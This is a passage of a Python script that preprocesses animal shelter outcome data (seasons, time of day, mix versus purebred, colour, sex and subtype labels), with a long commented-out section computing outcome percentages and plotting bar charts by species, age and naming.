#now that names are taken care of we need to handle the DateTime data
listOfSeasons = []
listOfTimeOfDays = []
#use a simple regular expression to grab distinct parts of th date data
for i in range(len(dataVectors)):
getMonthAndTime = re.findall('\d+-(\d+)-\d+ (\d+):\d+:\d+',dataVectors[i][2])
month = int(getMonthAndTime[0][0])
time = int(getMonthAndTime[0][1])
season = ''
timeOfDay = ''
if month >= 3 and month <= 5:
season = 'Spring'
if month >= 6 and month <= 8:
season = 'Summer'
if month >= 9 and month <= 11:
season = 'Fall'
if month == 12:
season = 'Winter'
if month >= 1 and month <= 2:
season = 'Winter'
if time >= 1 and time <= 6:
timeOfDay = 'Morning'
if time >= 7 and time <= 12:
timeOfDay = 'Morning'
if time >= 13 and time <= 18:
timeOfDay = 'Afternoon'
if time >= 19 and time <= 23:
timeOfDay = 'Night'
if time == 0:
timeOfDay = 'Night'
listOfSeasons.append(season)
listOfTimeOfDays.append(timeOfDay)
#save new data with name modified
np.savetxt('filterPass2.txt',data,fmt="%s",delimiter=',')
dataVectors = []
file = open('filterPass2.txt','r')
for line in file:
dataVectors.append(line.strip().split(','))
file.close()
dataLen3 = len(dataVectors)
#get rid of animalID and datetime and add timeOfDay and Seasons
for i in range(dataLen3):
dataVectors[i].pop(2)
dataVectors[i].pop(0)
dataVectors[i].insert(1, listOfSeasons[i])
dataVectors[i].insert(2, listOfTimeOfDays[i])
#save data with new timeOfDay and Seasons attributes
data2 = np.array(dataVectors)
np.savetxt('filterPass3.txt',data2,fmt="%s",delimiter=',')
#generate new data array
data=np.array(np.genfromtxt('filterPass3.txt',dtype=('S32','S32','S32','S32','S32','S32','S32','S32','S32','S32'),delimiter=',',names=attributes))
dataVectors = []
file = open('filterPass3.txt','r')
for line in file:
dataVectors.append(line.strip().split(','))
file.close
isMixOrNot = []
#determine if an animal is a mix or not
for i in range(len(dataVectors)):
if 'Mix' in data[i][8]:
isMixOrNot.append('Mix')
else:
isMixOrNot.append('Purebred')
for i in range(len(dataVectors)):
data[i][8] = isMixOrNot[i]
#np.savetxt('filterPass4.txt',data,fmt="%s",delimiter=',')
#data=np.array(np.genfromtxt('filterPass4.txt',dtype=('S32','S32','S32','S32','S32','S32','S32','S32','S32','S32'),delimiter=',',names=attributes))
#dataVectors = []
#file = open('filterPass4.txt','r')
#for line in file:
# dataVectors.append(line.strip().split(','))
#file.close
mixedColorOrNot = []
for i in range(len(dataVectors)):
if '/' in data[i][9]:
mixedColorOrNot.append('MixedColor')
else:
mixedColorOrNot.append('SolidColor')
for i in range(len(dataVectors)):
data[i][9] = mixedColorOrNot[i]
#get rid of the rest of the whitespace in the data so it can be used with Association Rules
idx_subtype_0 = data['OutcomeSubtype'] == ''
idx_subtype_1 = data['OutcomeSubtype'] == 'At Vet'
idx_subtype_2 = data['OutcomeSubtype'] == 'Foster'
idx_subtype_3 = data['OutcomeSubtype'] == 'In Foster'
idx_subtype_4 = data['OutcomeSubtype'] == 'In Kennel'
idx_subtype_5 = data['OutcomeSubtype'] == 'In Surgery'
idx_subtype_6 = data['OutcomeSubtype'] == 'Rabies Risk'
data['OutcomeSubtype'][idx_subtype_0] = "NoSubtype"
data['OutcomeSubtype'][idx_subtype_1] = "AtVet"
data['OutcomeSubtype'][idx_subtype_2] = "Foster"
data['OutcomeSubtype'][idx_subtype_3] = "Foster"
data['OutcomeSubtype'][idx_subtype_4] = "Kennel"
data['OutcomeSubtype'][idx_subtype_5] = "Surgery"
data['OutcomeSubtype'][idx_subtype_6] = "RabiesRisk"
idx_sex_0 = data['SexuponOutcome'] == ''
idx_sex_1 = data['SexuponOutcome'] == 'Intact Male'
idx_sex_2 = data['SexuponOutcome'] == 'Intact Female'
idx_sex_3 = data['SexuponOutcome'] == 'Spayed Female'
idx_sex_4 = data['SexuponOutcome'] == 'Neutered Male'
data['SexuponOutcome'][idx_sex_1] = "IntactMale"
data['SexuponOutcome'][idx_sex_2] = "IntactFemale"
data['SexuponOutcome'][idx_sex_3] = "SpayedFemale"
data['SexuponOutcome'][idx_sex_4] = "NeuteredMale"
data['SexuponOutcome'][idx_sex_0] = "Unknown"
np.savetxt('filterPass4.txt',data,fmt="%s",delimiter=',')
#dataVectors = []
#file = open('filterPass5.txt','r')
#for line in file:
# dataVectors.append(line.strip().split(','))
#file.close()
#newData = np.array(dataVectors)
#np.savetxt('filterPass6.txt',newData,fmt="%s",delimiter=',')
#listOfUniqueElements = [[] for i in range(10)]
#for i in range(len(dataVectors)):
# for k in range(len(dataVectors[i])):
# if dataVectors[i][k] not in listOfUniqueElements[k]:
# listOfUniqueElements[k].append(dataVectors[i][k])
#listOfNumericalElements = [[] for i in range(10)]
#for i in range(len(dataVectors)):
# for k in range(len(dataVectors[i])):
# listOfNumericalElements[k].append(listOfUniqueElements[k].index(dataVectors[i][k]))
#dataVectorsTest = []
#file = open('filterPass6.txt','r')
#for line in file:
# dataVectorsTest.append(line.strip().split(','))
#file.close()
#listOfNumericalElementsTest = [[] for i in range(10)]
#for i in range(len(dataVectorsTest)):
# for k in range(len(dataVectorsTest[i])):
# listOfNumericalElementsTest[k].append(listOfUniqueElements[k].index(dataVectorsTest[i][k]))
#f = open('numericalDataTrain.txt', 'w')
#for i in range(len(listOfNumericalElements[0])):
# for k in range(len(listOfNumericalElements)):
# f.write(str(listOfNumericalElements[k][i]))
# if k != len(listOfNumericalElements) - 1:
# f.write(',')
# f.write('\n')
#f.close()
#f = open('numericalDataTest.txt', 'w')
#for i in range(len(listOfNumericalElementsTest[0])):
# for k in range(len(listOfNumericalElementsTest)):
# f.write(str(listOfNumericalElementsTest[k][i]))
# if k != len(listOfNumericalElementsTest) - 1:
# f.write(',')
# f.write('\n')
#f.close()
#everything below this point was the code to produce those bar graphs that were in the presentation
#there was a lot of tedious and copy pasted probability calculation in it
#however all the code is down there so you can see, just uncomment if you wish to run yourself
#mixDogsAdopted = 0
#mixDogsDied = 0
#mixDogsTransfered = 0
#mixDogsReturnedToOwners = 0
#mixDogsEuthanized = 0
#purebredDogsAdopted = 0
#purebredDogsDied = 0
#purebredDogsTransfered = 0
#purebredDogsReturnedToOwners = 0
#purebredDogsEuthanized = 0
#mixCatsAdopted = 0
#mixCatsDied = 0
#mixCatsTransfered = 0
#mixCatsReturnedToOwners = 0
#mixCatsEuthanized = 0
#purebredCatsAdopted = 0
#purebredCatsDied = 0
#purebredCatsTransfered = 0
#purebredCatsReturnedToOwners = 0
#purebredCatsEuthanized = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][8] == 'Mix':
# mixDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][8] == 'Mix':
# mixDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][8] == 'Mix':
# mixDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][8] == 'Mix':
# mixDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][8] == 'Mix':
# mixDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][8] == 'Purebred':
# purebredDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][8] == 'Purebred':
# purebredDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][8] == 'Purebred':
# purebredDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][8] == 'Purebred':
# purebredDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][8] == 'Purebred':
# purebredDogsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][8] == 'Mix':
# mixCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][8] == 'Mix':
# mixCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][8] == 'Mix':
# mixCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][8] == 'Mix':
# mixCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][8] == 'Mix':
# mixCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][8] == 'Purebred':
# purebredCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][8] == 'Purebred':
# purebredCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][8] == 'Purebred':
# purebredCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][8] == 'Purebred':
# purebredCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][8] == 'Purebred':
# purebredCatsEuthanized += 1
#nummixDogs = 0
#numpurebredDogs = 0
#nummixCats = 0
#numpurebredCats = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][8] == 'Mix':
# nummixDogs += 1
# if data[i][5] == 'Dog' and data[i][8] == 'Purebred':
# numpurebredDogs += 1
# if data[i][5] == 'Cat' and data[i][8] == 'Mix':
# nummixCats += 1
# if data[i][5] == 'Cat' and data[i][8] == 'Purebred':
# numpurebredCats += 1
#percentagemixDogsAdopted = mixDogsAdopted/nummixDogs*100
#percentagemixDogsDied = mixDogsDied/nummixDogs*100
#percentagemixDogsTransfered = mixDogsTransfered/nummixDogs*100
#percentagemixDogsReturnToOwners = mixDogsReturnedToOwners/nummixDogs*100
#percentagemixDogsEuthanized = mixDogsEuthanized/nummixDogs*100
#percentagemixDogsOutcomes = [percentagemixDogsAdopted, percentagemixDogsDied, percentagemixDogsTransfered, percentagemixDogsReturnToOwners, percentagemixDogsEuthanized]
#percentagepurebredDogsAdopted = purebredDogsAdopted/numpurebredDogs*100
#percentagepurebredDogsDied = purebredDogsDied/numpurebredDogs*100
#percentagepurebredDogsTransfered = purebredDogsTransfered/numpurebredDogs*100
#percentagepurebredDogsReturnToOwners = purebredDogsReturnedToOwners/numpurebredDogs*100
#percentagepurebredDogsEuthanized = purebredDogsEuthanized/numpurebredDogs*100
#percentagepurebredDogsOutcomes = [percentagepurebredDogsAdopted, percentagepurebredDogsDied, percentagepurebredDogsTransfered, percentagepurebredDogsReturnToOwners, percentagepurebredDogsEuthanized]
#percentagemixCatsAdopted = mixCatsAdopted/nummixCats*100
#percentagemixCatsDied = mixCatsDied/nummixCats*100
#percentagemixCatsTransfered = mixCatsTransfered/nummixCats*100
#percentagemixCatsReturnToOwners = mixCatsReturnedToOwners/nummixCats*100
#percentagemixCatsEuthanized = mixCatsEuthanized/nummixCats*100
#percentagemixCatsOutcomes = [percentagemixCatsAdopted, percentagemixCatsDied, percentagemixCatsTransfered, percentagemixCatsReturnToOwners, percentagemixCatsEuthanized]
#percentagepurebredCatsAdopted = purebredCatsAdopted/numpurebredCats*100
#percentagepurebredCatsDied = purebredCatsDied/numpurebredCats*100
#percentagepurebredCatsTransfered = purebredCatsTransfered/numpurebredCats*100
#percentagepurebredCatsReturnToOwners = purebredCatsReturnedToOwners/numpurebredCats*100
#percentagepurebredCatsEuthanized = purebredCatsEuthanized/numpurebredCats*100
#percentagepurebredCatsOutcomes = [percentagepurebredCatsAdopted, percentagepurebredCatsDied, percentagepurebredCatsTransfered, percentagepurebredCatsReturnToOwners, percentagepurebredCatsEuthanized]
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentagemixDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Mixed Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentagepurebredDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Purebred Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentagemixCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Mixed Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentagepurebredCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Purebred Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#youngDogsAdopted = 0
#youngDogsDied = 0
#youngDogsTransfered = 0
#youngDogsReturnedToOwners = 0
#youngDogsEuthanized = 0
#middleAgedDogsAdopted = 0
#middleAgedDogsDied = 0
#middleAgedDogsTransfered = 0
#middleAgedDogsReturnedToOwners = 0
#middleAgedDogsEuthanized = 0
#oldDogsAdopted = 0
#oldDogsDied = 0
#oldDogsTransfered = 0
#oldDogsReturnedToOwners = 0
#oldDogsEuthanized = 0
#######################################
#youngCatsAdopted = 0
#youngCatsDied = 0
#youngCatsTransfered = 0
#youngCatsReturnedToOwners = 0
#youngCatsEuthanized = 0
#middleAgedCatsAdopted = 0
#middleAgedCatsDied = 0
#middleAgedCatsTransfered = 0
#middleAgedCatsReturnedToOwners = 0
#middleAgedCatsEuthanized = 0
#oldCatsAdopted = 0
#oldCatsDied = 0
#oldCatsTransfered = 0
#oldCatsReturnedToOwners = 0
#oldCatsEuthanized = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][7] == '<5years':
# youngDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][7] == '<5years':
# youngDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][7] == '<5years':
# youngDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][7] == '<5years':
# youngDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][7] == '<5years':
# youngDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][7] == '>=5and<10years':
# middleAgedDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][7] == '>=5and<10years':
# middleAgedDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][7] == '>=5and<10years':
# middleAgedDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][7] == '>=5and<10years':
# middleAgedDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][7] == '>=5and<10years':
# middleAgedDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][7] == '>=10years':
# oldDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][7] == '>=10years':
# oldDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][7] == '>=10years':
# oldDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][7] == '>=10years':
# oldDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][7] == '>=10years':
# oldDogsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][7] == '<5years':
# youngCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][7] == '<5years':
# youngCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][7] == '<5years':
# youngCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][7] == '<5years':
# youngCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][7] == '<5years':
# youngCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][7] == '>=5and<10years':
# middleAgedCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][7] == '>=5and<10years':
# middleAgedCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][7] == '>=5and<10years':
# middleAgedCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][7] == '>=5and<10years':
# middleAgedCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][7] == '>=5and<10years':
# middleAgedCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][7] == '>=10years':
# oldCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][7] == '>=10years':
# oldCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][7] == '>=10years':
# oldCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][7] == '>=10years':
# oldCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][7] == '>=10years':
# oldCatsEuthanized += 1
#numOfDogs = np.sum(data['AnimalType'] == 'Dog')
#numOfCats = np.sum(data['AnimalType'] == 'Cat')
#numAdopted = np.sum(data['OutcomeType'] == 'Adoption')
#numDied = np.sum(data['OutcomeType'] == 'Died')
#numEuthanized = np.sum(data['OutcomeType'] == 'Euthanasia')
#numTransfered = np.sum(data['OutcomeType'] == 'Transfer')
#numReturned = np.sum(data['OutcomeType'] == 'Return_to_owner')
#numYoungDogs = 0
#numMiddleDogs = 0
#numOldDogs = 0
#numYoungCats = 0
#numMiddleCats = 0
#numOldCats = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][7] == '<5years':
# numYoungDogs += 1
# if data[i][5] == 'Dog' and data[i][7] == '>=5and<10years':
# numMiddleDogs += 1
# if data[i][5] == 'Dog' and data[i][7] == '>=10years':
# numOldDogs += 1
# if data[i][5] == 'Cat' and data[i][7] == '<5years':
# numYoungCats += 1
# if data[i][5] == 'Cat' and data[i][7] == '>=5and<10years':
# numMiddleCats += 1
# if data[i][5] == 'Cat' and data[i][7] == '>=10years':
# numOldCats += 1
#percentageYoungDogsAdopted = youngDogsAdopted/numYoungDogs*100
#percentageYoungDogsDied = youngDogsDied/numYoungDogs*100
#percentageYoungDogsTransfered = youngDogsTransfered/numYoungDogs*100
#percentageYoungDogsReturnToOwners = youngDogsReturnedToOwners/numYoungDogs*100
#percentageYoungDogsEuthanized = youngDogsEuthanized/numYoungDogs*100
#percentageYoungDogsOutcomes = [percentageYoungDogsAdopted, percentageYoungDogsDied, percentageYoungDogsTransfered, percentageYoungDogsReturnToOwners, percentageYoungDogsEuthanized]
#percentageMiddleDogsAdopted = middleAgedDogsAdopted/numMiddleDogs*100
#percentageMiddleDogsDied = middleAgedDogsDied/numMiddleDogs*100
#percentageMiddleDogsTransfered = middleAgedDogsTransfered/numMiddleDogs*100
#percentageMiddleDogsReturnToOwners = middleAgedDogsReturnedToOwners/numMiddleDogs*100
#percentageMiddleDogsEuthanized = middleAgedDogsEuthanized/numMiddleDogs*100
#percentageMiddleDogsOutcomes = [percentageMiddleDogsAdopted, percentageMiddleDogsDied, percentageMiddleDogsTransfered, percentageMiddleDogsReturnToOwners, percentageMiddleDogsEuthanized]
#percentageOldDogsAdopted = oldDogsAdopted/numOldDogs*100
#percentageOldDogsDied = oldDogsDied/numOldDogs*100
#percentageOldDogsTransfered = oldDogsTransfered/numOldDogs*100
#percentageOldDogsReturnToOwners = oldDogsReturnedToOwners/numOldDogs*100
#percentageOldDogsEuthanized = oldDogsEuthanized/numOldDogs*100
#percentageOldDogsOutcomes = [percentageOldDogsAdopted, percentageOldDogsDied, percentageOldDogsTransfered, percentageOldDogsReturnToOwners, percentageOldDogsEuthanized]
#percentageYoungCatsAdopted = youngCatsAdopted/numYoungCats*100
#percentageYoungCatsDied = youngCatsDied/numYoungCats*100
#percentageYoungCatsTransfered = youngCatsTransfered/numYoungCats*100
#percentageYoungCatsReturnToOwners = youngCatsReturnedToOwners/numYoungCats*100
#percentageYoungCatsEuthanized = youngCatsEuthanized/numYoungCats*100
#percentageYoungCatsOutcomes = [percentageYoungCatsAdopted, percentageYoungCatsDied, percentageYoungCatsTransfered, percentageYoungCatsReturnToOwners, percentageYoungCatsEuthanized]
#percentageMiddleCatsAdopted = middleAgedCatsAdopted/numMiddleCats*100
#percentageMiddleCatsDied = middleAgedCatsDied/numMiddleCats*100
#percentageMiddleCatsTransfered = middleAgedCatsTransfered/numMiddleCats*100
#percentageMiddleCatsReturnToOwners = middleAgedCatsReturnedToOwners/numMiddleCats*100
#percentageMiddleCatsEuthanized = middleAgedCatsEuthanized/numMiddleCats*100
#percentageMiddleCatsOutcomes = [percentageMiddleCatsAdopted, percentageMiddleCatsDied, percentageMiddleCatsTransfered, percentageMiddleCatsReturnToOwners, percentageMiddleCatsEuthanized]
#percentageOldCatsAdopted = oldCatsAdopted/numOldCats*100
#percentageOldCatsDied = oldCatsDied/numOldCats*100
#percentageOldCatsTransfered = oldCatsTransfered/numOldCats*100
#percentageOldCatsReturnToOwners = oldCatsReturnedToOwners/numOldCats*100
#percentageOldCatsEuthanized = oldCatsEuthanized/numOldCats*100
#percentageOldCatsOutcomes = [percentageOldCatsAdopted, percentageOldCatsDied, percentageOldCatsTransfered, percentageOldCatsReturnToOwners, percentageOldCatsEuthanized]
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageYoungDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Young Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageMiddleDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Middle Aged Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageOldDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Old Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageYoungCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Young Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageMiddleCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Middle Aged Cats Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageOldCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Old Cats Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#namedDogsAdopted = 0
#namedDogsDied = 0
#namedDogsTransfered = 0
#namedDogsReturnedToOwners = 0
#namedDogsEuthanized = 0
#unNamedDogsAdopted = 0
#unNamedDogsDied = 0
#unNamedDogsTransfered = 0
#unNamedDogsReturnedToOwners = 0
#unNamedDogsEuthanized = 0
#namedCatsAdopted = 0
#namedCatsDied = 0
#namedCatsTransfered = 0
#namedCatsReturnedToOwners = 0
#namedCatsEuthanized = 0
#unNamedCatsAdopted = 0
#unNamedCatsDied = 0
#unNamedCatsTransfered = 0
#unNamedCatsReturnedToOwners = 0
#unNamedCatsEuthanized = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][0] == 'Named':
# namedDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][0] == 'Named':
# namedDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][0] == 'Named':
# namedDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][0] == 'Named':
# namedDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][0] == 'Named':
# namedDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][0] == 'NoName':
# unNamedDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][0] == 'NoName':
# unNamedDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][0] == 'NoName':
# unNamedDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][0] == 'NoName':
# unNamedDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][0] == 'NoName':
# unNamedDogsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][0] == 'Named':
# namedCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][0] == 'Named':
# namedCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][0] == 'Named':
# namedCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][0] == 'Named':
# namedCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][0] == 'Named':
# namedCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][0] == 'NoName':
# unNamedCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][0] == 'NoName':
# unNamedCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][0] == 'NoName':
# unNamedCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][0] == 'NoName':
# unNamedCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][0] == 'NoName':
# unNamedCatsEuthanized += 1
#numNamedDogs = 0
#numUnNamedDogs = 0
#numNamedCats = 0
#numUnNamedCats = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][0] == 'Named':
# numNamedDogs += 1
# if data[i][5] == 'Dog' and data[i][0] == 'NoName':
# numUnNamedDogs += 1
# if data[i][5] == 'Cat' and data[i][0] == 'Named':
# numNamedCats += 1
# if data[i][5] == 'Cat' and data[i][0] == 'NoName':
# numUnNamedCats += 1
#percentageNamedDogsAdopted = namedDogsAdopted/numNamedDogs*100
#percentageNamedDogsDied = namedDogsDied/numNamedDogs*100
#percentageNamedDogsTransfered = namedDogsTransfered/numNamedDogs*100
#percentageNamedDogsReturnToOwners = namedDogsReturnedToOwners/numNamedDogs*100
#percentageNamedDogsEuthanized = namedDogsEuthanized/numNamedDogs*100
#percentageNamedDogsOutcomes = [percentageNamedDogsAdopted, percentageNamedDogsDied, percentageNamedDogsTransfered, percentageNamedDogsReturnToOwners, percentageNamedDogsEuthanized]
#percentageUnNamedDogsAdopted = unNamedDogsAdopted/numUnNamedDogs*100
#percentageUnNamedDogsDied = unNamedDogsDied/numUnNamedDogs*100
#percentageUnNamedDogsTransfered = unNamedDogsTransfered/numUnNamedDogs*100
#percentageUnNamedDogsReturnToOwners = unNamedDogsReturnedToOwners/numUnNamedDogs*100
#percentageUnNamedDogsEuthanized = unNamedDogsEuthanized/numUnNamedDogs*100
#percentageUnNamedDogsOutcomes = [percentageUnNamedDogsAdopted, percentageUnNamedDogsDied, percentageUnNamedDogsTransfered, percentageUnNamedDogsReturnToOwners, percentageUnNamedDogsEuthanized]
#percentageNamedCatsAdopted = namedCatsAdopted/numNamedCats*100
#percentageNamedCatsDied = namedCatsDied/numNamedCats*100
#percentageNamedCatsTransfered = namedCatsTransfered/numNamedCats*100
#percentageNamedCatsReturnToOwners = namedCatsReturnedToOwners/numNamedCats*100
#percentageNamedCatsEuthanized = namedCatsEuthanized/numNamedCats*100
#percentageNamedCatsOutcomes = [percentageNamedCatsAdopted, percentageNamedCatsDied, percentageNamedCatsTransfered, percentageNamedCatsReturnToOwners, percentageNamedCatsEuthanized]
#percentageUnNamedCatsAdopted = unNamedCatsAdopted/numUnNamedCats*100
#percentageUnNamedCatsDied = unNamedCatsDied/numUnNamedCats*100
#percentageUnNamedCatsTransfered = unNamedCatsTransfered/numUnNamedCats*100
#percentageUnNamedCatsReturnToOwners = unNamedCatsReturnedToOwners/numUnNamedCats*100
#percentageUnNamedCatsEuthanized = unNamedCatsEuthanized/numUnNamedCats*100
